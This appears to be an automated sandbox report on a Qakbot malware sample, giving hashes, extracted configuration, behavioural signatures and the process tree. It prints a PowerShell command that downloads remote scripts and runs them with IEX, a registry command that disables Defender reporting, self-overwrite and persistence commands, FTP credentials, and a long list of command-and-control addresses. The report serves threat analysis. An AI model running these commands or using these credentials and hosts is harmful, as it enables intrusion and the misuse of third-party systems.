Analysis
-
max time kernel
148s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
08-05-2024 02:19
Static task
static1
Behavioral task
behavioral1
Sample
b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
Resource
win10v2004-20240426-en
General
-
Target
b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
-
Size
536KB
-
MD5
4d9add7f38d2bfcfbc3d4bcf3f44e47d
-
SHA1
c9198de89705f6983a50c445ed1866a24cc9c846
-
SHA256
b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba
-
SHA512
06e86fdfd21bfc8b91f1489bda9e17e27e5bc6855a4f91753353d4d8fbcb645ccef8b70e92eb2e5ed7edad55e87fe75e7a597310e464354313d01a8a6a068d32
-
SSDEEP
6144:K3puL8eujbUcqbRI30RYAimlQY1KdZwzlW+2M0WybVGH/Itkug/i03s/nZYIVQV2:R8eSbcRYAplQYU3YlWOdT/pbqUVxg
Malware Config
Extracted
https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1
Extracted
qakbot
322.358
1524770894
Protocol: ftp- Host:
37.60.244.211 - Port:
21 - Username:
[email protected] - Password:
4AsEzIaMwi2d
Protocol: ftp- Host:
198.38.77.162 - Port:
21 - Username:
[email protected] - Password:
kJm6DKVPfyiv
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
[email protected] - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
[email protected] - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
[email protected] - Password:
RoP4Af0RKAAQ74V
65.40.207.151:995
98.242.248.219:443
96.248.7.111:443
24.240.178.42:995
67.141.64.98:443
12.166.108.82:995
47.223.79.196:993
73.48.132.91:443
24.209.130.208:443
216.16.14.19:443
173.81.42.136:443
209.213.24.194:443
69.129.91.38:443
185.219.83.73:443
70.182.79.66:443
68.49.120.179:443
73.222.54.231:443
66.189.228.49:995
98.190.205.8:443
216.21.168.27:32101
24.228.185.224:2222
70.118.18.242:443
87.243.42.123:443
71.168.229.249:443
24.181.38.49:443
69.41.8.88:443
108.35.23.218:443
71.190.202.120:443
173.160.3.209:995
216.201.159.118:443
90.86.150.91:2222
75.189.235.216:443
96.69.89.156:995
98.103.2.226:443
24.217.116.38:50001
96.248.7.111:995
75.127.141.50:995
82.34.193.149:443
66.76.106.90:995
96.73.55.193:993
141.155.182.103:443
50.195.161.2:995
24.182.92.123:443
107.15.153.110:443
73.108.162.130:443
67.83.122.112:2222
67.77.20.7:443
89.21.72.103:443
216.21.168.27:50000
68.46.145.243:443
75.109.193.173:8443
75.109.193.173:2087
75.109.193.173:1194
47.134.180.77:443
96.248.7.111:50002
50.252.93.122:995
66.222.48.40:443
47.40.29.239:443
47.40.208.189:443
77.122.224.184:995
47.48.236.98:2222
24.42.164.2:22
67.135.230.218:443
68.173.55.51:443
190.185.219.110:443
216.21.168.27:995
93.108.180.227:443
50.73.23.181:995
192.227.112.57:443
98.190.202.177:995
173.196.11.46:2222
184.174.166.107:443
70.94.109.57:443
24.187.255.116:443
96.57.48.126:443
69.193.199.50:995
69.57.119.116:995
68.35.40.147:443
79.166.72.207:443
71.168.229.249:995
105.229.113.122:443
24.97.19.14:443
223.206.41.165:443
99.197.182.183:443
104.129.198.111:443
166.128.86.121:443
190.229.244.124:443
68.113.142.24:465
173.86.63.222:995
208.104.162.51:443
50.84.26.190:443
172.119.71.75:995
184.189.154.10:443
12.196.116.242:443
165.166.14.65:443
24.175.99.25:443
137.119.61.34:443
50.205.176.66:443
71.222.143.110:61200
71.208.209.92:995
184.21.70.27:443
12.31.240.130:443
106.159.251.143:995
97.78.121.82:443
70.21.182.149:2222
24.95.77.126:443
12.2.201.35:443
173.46.245.33:995
50.42.189.206:993
72.203.104.26:443
50.198.141.161:2078
108.27.217.183:443
75.109.193.173:2222
66.68.162.209:995
173.248.25.11:443
96.29.37.232:443
71.172.250.114:443
70.169.12.141:443
108.184.67.99:443
67.238.217.56:443
174.69.127.91:2083
68.188.1.58:2222
108.44.33.251:995
206.19.205.160:61200
24.6.31.163:443
67.60.211.222:990
199.106.158.8:443
206.74.6.2:443
73.255.102.158:443
65.191.128.99:443
75.109.193.173:2078
98.102.180.78:50000
68.228.118.130:32100
73.58.39.242:443
98.221.28.158:443
24.1.226.21:443
216.41.249.40:443
66.222.88.126:995
24.45.182.199:2222
42.190.194.77:2222
70.60.8.194:443
66.68.162.209:993
172.87.188.2:443
50.74.75.238:443
165.166.60.130:443
165.138.13.253:443
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2712 powershell.exe 6 2712 powershell.exe 7 2712 powershell.exe 8 2712 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2620 ipivo.exe 2448 ipivo.exe -
Loads dropped DLL 3 IoCs
pid Process 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 2620 ipivo.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\mpfwhxwqg = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Ipivop\\ipivo.exe\"" explorer.exe -
pid Process 2712 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 780 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 3036 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 3036 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 2620 ipivo.exe 2712 powershell.exe 2448 ipivo.exe 2448 ipivo.exe 2464 explorer.exe 1080 taskhost.exe 2464 explorer.exe 1180 Dwm.exe 1212 Explorer.EXE 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 2712 powershell.exe 2552 conhost.exe 2464 explorer.exe 324 cmd.exe 772 conhost.exe 780 PING.EXE 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe 2464 explorer.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2620 ipivo.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2712 powershell.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 1888 wrote to memory of 3036 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 28 PID 1888 wrote to memory of 3036 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 28 PID 1888 wrote to memory of 3036 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 28 PID 1888 wrote to memory of 3036 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 28 PID 1888 wrote to memory of 2620 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 29 PID 1888 wrote to memory of 2620 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 29 PID 1888 wrote to memory of 2620 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 29 PID 1888 wrote to memory of 2620 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 29 PID 1888 wrote to memory of 2516 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 30 PID 1888 wrote to memory of 2516 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 30 PID 1888 wrote to memory of 2516 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 30 PID 1888 wrote to memory of 2516 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 30 PID 1888 wrote to memory of 2712 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 32 PID 1888 wrote to memory of 2712 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 32 PID 1888 wrote to memory of 2712 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 32 PID 1888 wrote to memory of 2712 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 32 PID 2620 wrote to memory of 2448 2620 ipivo.exe 34 PID 2620 wrote to memory of 2448 2620 ipivo.exe 34 PID 2620 wrote to memory of 2448 2620 ipivo.exe 34 PID 2620 wrote to memory of 2448 2620 ipivo.exe 34 PID 2620 wrote to memory of 2464 2620 ipivo.exe 35 PID 2620 wrote to memory of 2464 2620 ipivo.exe 35 PID 2620 wrote to memory of 2464 2620 ipivo.exe 35 PID 2620 wrote to memory of 2464 2620 ipivo.exe 35 PID 2620 wrote to memory of 2464 2620 ipivo.exe 35 PID 2464 wrote to memory of 1080 2464 explorer.exe 18 PID 2464 wrote to memory of 1080 2464 explorer.exe 18 PID 2464 wrote to memory of 1080 2464 explorer.exe 18 PID 2464 wrote to memory of 1180 2464 explorer.exe 20 PID 2464 wrote to memory of 1180 2464 explorer.exe 20 PID 2464 wrote to memory of 1180 2464 explorer.exe 20 PID 2464 wrote to memory of 1212 2464 explorer.exe 21 PID 2464 wrote to memory of 1212 2464 explorer.exe 21 PID 2464 wrote to memory of 1212 2464 explorer.exe 21 PID 2464 wrote to memory of 1888 2464 explorer.exe 27 PID 2464 wrote to memory of 1888 2464 explorer.exe 27 PID 2464 wrote to memory of 1888 2464 explorer.exe 27 PID 2464 wrote to memory of 2712 2464 explorer.exe 32 PID 2464 wrote to memory of 2712 2464 explorer.exe 32 PID 2464 wrote to memory of 2712 2464 explorer.exe 32 PID 2464 wrote to memory of 2552 2464 explorer.exe 33 PID 2464 wrote to memory of 2552 2464 explorer.exe 33 PID 2464 wrote to memory of 2552 2464 explorer.exe 33 PID 1888 wrote to memory of 324 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 36 PID 1888 wrote to memory of 324 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 36 PID 1888 wrote to memory of 324 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 36 PID 1888 wrote to memory of 324 1888 b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe 36 PID 324 wrote to memory of 780 324 cmd.exe 38 PID 324 wrote to memory of 780 324 cmd.exe 38 PID 324 wrote to memory of 780 324 cmd.exe 38 PID 324 wrote to memory of 780 324 cmd.exe 38 PID 2464 wrote to memory of 324 2464 explorer.exe 36 PID 2464 wrote to memory of 324 2464 explorer.exe 36 PID 2464 wrote to memory of 324 2464 explorer.exe 36 PID 2464 wrote to memory of 772 2464 explorer.exe 37 PID 2464 wrote to memory of 772 2464 explorer.exe 37 PID 2464 wrote to memory of 772 2464 explorer.exe 37 PID 2464 wrote to memory of 780 2464 explorer.exe 38 PID 2464 wrote to memory of 780 2464 explorer.exe 38 PID 2464 wrote to memory of 780 2464 explorer.exe 38
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1080
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1180
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1212 -
C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe"C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe"C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe" /C3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3036
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Ipivop\ipivo.exeC:\Users\Admin\AppData\Roaming\Microsoft\Ipivop\ipivo.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Roaming\Microsoft\Ipivop\ipivo.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Ipivop\ipivo.exe" /C4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2448
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2464
-
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"3⤵PID:2516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\zdxlfcykafgkxlepblevondalsjz.txt'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.14⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
PID:780
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-759720614-114551988-10829642891142499248-1346065353-1708930420-1692500942159465668"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2552
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "6709464081603188433999079362-490326400938330376404741403446901449-173702388"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:772
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
92B
MD52ee74921ed7e6b2559788baae8ff936e
SHA1df4f5e28c383ce7329049f2037af4be56e52a415
SHA256e1d4df1660a5fcb96400289bc31e77a8f01c07e0237e785e70b125c849ffb74c
SHA512c1db4ee38eba5c5968959b647a63269d2c45114cec0f7eab6cfae0c25b6f4a2fe051a12038aa6e4a6e3c59cb1399094f74dc2c21adb7b7d32689948db3a2abc0
-
Filesize
536KB
MD54d9add7f38d2bfcfbc3d4bcf3f44e47d
SHA1c9198de89705f6983a50c445ed1866a24cc9c846
SHA256b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba
SHA51206e86fdfd21bfc8b91f1489bda9e17e27e5bc6855a4f91753353d4d8fbcb645ccef8b70e92eb2e5ed7edad55e87fe75e7a597310e464354313d01a8a6a068d32